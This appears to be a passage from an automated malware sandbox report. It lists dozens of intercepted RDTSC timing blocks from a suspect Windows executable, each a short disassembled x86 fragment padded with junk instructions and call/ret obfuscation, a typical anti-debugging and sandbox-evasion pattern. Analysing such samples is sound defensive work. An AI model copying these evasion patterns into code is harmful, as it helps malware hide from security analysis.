        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4D36 second address: 7F4D4F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F48A0C206D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007F48A0C206D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFAB8 second address: 7EFABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFABE second address: 7EFAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5DE2 second address: 7F5DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8CFC second address: 7F8D06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F48A0C206DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7E96 second address: 7F7E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8E1A second address: 7F8EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F48A0C206D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+122D2A9Ch] 0x0000002a movsx edi, di 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F48A0C206D8h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 00000017h 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 call 00007F48A0C206DCh 0x0000005a sbb bx, D704h 0x0000005f pop ebx 0x00000060 mov eax, dword ptr [ebp+122D0271h] 0x00000066 push FFFFFFFFh 0x00000068 jbe 00007F48A0C206DCh 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push ebx 0x00000072 ja 00007F48A0C206D6h 0x00000078 pop ebx 0x00000079 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7E9B second address: 7F7EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAD5B second address: 7FAE23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c ja 00007F48A0C206EDh 0x00000012 push esi 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, edi 0x0000001d sub dword ptr [ebp+122D1CE2h], ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F48A0C206D8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov edi, 79C36274h 0x00000049 sub edi, dword ptr [ebp+122D2B40h] 0x0000004f mov eax, dword ptr [ebp+122D0F0Dh] 0x00000055 push 00000000h 0x00000057 push ebp 0x00000058 call 00007F48A0C206D8h 0x0000005d pop ebp 0x0000005e mov dword ptr [esp+04h], ebp 0x00000062 add dword ptr [esp+04h], 00000018h 0x0000006a inc ebp 0x0000006b push ebp 0x0000006c ret 0x0000006d pop ebp 0x0000006e ret 0x0000006f call 00007F48A0C206DBh 0x00000074 js 00007F48A0C206DCh 0x0000007a je 00007F48A0C206D6h 0x00000080 pop edi 0x00000081 push FFFFFFFFh 0x00000083 mov dword ptr [ebp+1244B489h], edx 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c jo 00007F48A0C206DCh 0x00000092 jne 00007F48A0C206D6h 0x00000098 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7EA1 second address: 7F7EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9F46 second address: 7F9F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBB5B second address: 7FBB65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9F4A second address: 7F9F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCB74 second address: 7FCB89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F48A0C1C538h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCB89 second address: 7FCB8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCB8F second address: 7FCC0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F48A0C1C538h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov edi, 10D7CBE0h 0x00000028 mov dword ptr [ebp+1244B4D7h], edx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F48A0C1C538h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a pushad 0x0000004b call 00007F48A0C1C53Dh 0x00000050 xor dx, FD81h 0x00000055 pop ecx 0x00000056 movzx edx, ax 0x00000059 popad 0x0000005a sbb bh, 0000004Bh 0x0000005d push 00000000h 0x0000005f or edi, dword ptr [ebp+122D29E0h] 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCC0E second address: 7FCC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD99F second address: 7FD9AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD9AF second address: 7FDA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F48A0C206D6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 jmp 00007F48A0C206E5h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F48A0C206D8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 stc 0x00000037 mov ebx, dword ptr [ebp+122D2B9Ch] 0x0000003d push eax 0x0000003e push ebx 0x0000003f je 00007F48A0C206DCh 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDB64 second address: 7FDB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDB68 second address: 7FDB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDB71 second address: 7FDC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F48A0C1C544h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F48A0C1C538h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f and bh, 00000074h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F48A0C1C538h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov di, 5E8Ah 0x00000057 mov eax, dword ptr [ebp+122D0D5Dh] 0x0000005d jmp 00007F48A0C1C53Fh 0x00000062 push FFFFFFFFh 0x00000064 sub dword ptr [ebp+122D3857h], esi 0x0000006a push eax 0x0000006b pushad 0x0000006c pushad 0x0000006d push ecx 0x0000006e pop ecx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BF89 second address: 79BF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BF8F second address: 79BF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BF93 second address: 79BFA7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F48A0C206D6h 0x00000008 jc 00007F48A0C206D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BFA7 second address: 79BFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BFAB second address: 79BFB1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C4A second address: 805C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F48A0C1C536h 0x00000009 jnc 00007F48A0C1C536h 0x0000000f jg 00007F48A0C1C536h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C63 second address: 805C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C69 second address: 805C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A90C second address: 80A918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A918 second address: 80A932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F48A0C1C536h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F48A0C1C536h 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A932 second address: 80A949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A949 second address: 80A973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F48A0C1C542h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A973 second address: 80A98C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C206D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007F48A0C206DEh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8109BA second address: 8109BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F6D9 second address: 80F6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C206E1h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jp 00007F48A0C206D6h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8100A7 second address: 8100C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F48A0C1C53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F48A0C1C53Dh 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101E9 second address: 8101FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F48A0C206DDh 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8101FD second address: 810216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F48A0C1C536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810216 second address: 81021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81021A second address: 810232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F48A0C1C53Ah 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810232 second address: 810269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F48A0C206E7h 0x0000000c jmp 00007F48A0C206E9h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81053F second address: 810545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810545 second address: 810549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8150D1 second address: 8150D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8150D8 second address: 8150DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81543F second address: 815458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815458 second address: 815463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F48A0C206D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155A2 second address: 8155A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815841 second address: 815847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815847 second address: 81584B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815E14 second address: 815E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206E1h 0x00000009 jns 00007F48A0C206D6h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815E2F second address: 815E4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Bh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jnc 00007F48A0C1C536h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F9F second address: 815FA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816169 second address: 81616F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81616F second address: 816175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D9C4 second address: 79D9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D9C8 second address: 79D9DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007F48A0C206D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F48A0C206E2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814DCC second address: 814DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814DD0 second address: 814DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A43A3 second address: 7A43C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C542h 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82353C second address: 823556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823556 second address: 82355C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823B64 second address: 823B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F48A0C206D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823F5A second address: 823F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F48A0C1C536h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823F69 second address: 823F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823F6F second address: 823FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C547h 0x00000009 popad 0x0000000a jno 00007F48A0C1C538h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F48A0C1C536h 0x0000001a jg 00007F48A0C1C536h 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823FA3 second address: 823FAD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E49D0 second address: 7E49D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4B01 second address: 7E4B07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4B07 second address: 7E4B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4B0D second address: 7E4B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4CCE second address: 7E4CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4CD2 second address: 7E4CE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4CE1 second address: 7E4CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4DD7 second address: 7E4DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 ja 00007F48A0C206DCh 0x0000000d je 00007F48A0C206DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E80 second address: 7E4EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F48A0C1C541h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f mov ch, bl 0x00000011 push 00000004h 0x00000013 ja 00007F48A0C1C545h 0x00000019 push eax 0x0000001a jmp 00007F48A0C1C53Dh 0x0000001f pop ecx 0x00000020 nop 0x00000021 push ecx 0x00000022 jno 00007F48A0C1C53Ch 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E523D second address: 7E52A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F48A0C206D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 je 00007F48A0C206D8h 0x00000016 pushad 0x00000017 jbe 00007F48A0C206D6h 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F48A0C206D8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D34EAh], esi 0x00000042 push 0000001Eh 0x00000044 jmp 00007F48A0C206DCh 0x00000049 mov dh, bl 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jnc 00007F48A0C206D8h 0x00000054 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52A5 second address: 7E52AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
